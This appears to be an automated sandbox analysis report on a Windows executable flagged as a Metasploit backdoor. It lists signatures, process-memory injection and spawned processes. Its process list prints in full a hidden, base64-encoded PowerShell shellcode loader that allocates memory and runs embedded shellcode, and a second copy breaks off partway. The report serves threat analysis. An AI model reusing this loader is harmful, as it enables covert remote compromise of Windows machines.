Malware Analysis Report

2024-10-18 21:34

Sample ID 240622-1nqgjavhrc
Target 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118
SHA256 ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624
Tags
metasploit backdoor execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624

Threat Level: Known bad

The file 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

metasploit backdoor execution trojan

MetaSploit

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-22 21:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-22 21:48

Reported

2024-06-22 21:50

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 720 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 720 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 720 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 1988 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 1988 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 1988 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 5004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 5004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 5004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 5004 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 5004 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4484 wrote to memory of 4776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4484 wrote to memory of 4776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4484 wrote to memory of 4776 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAI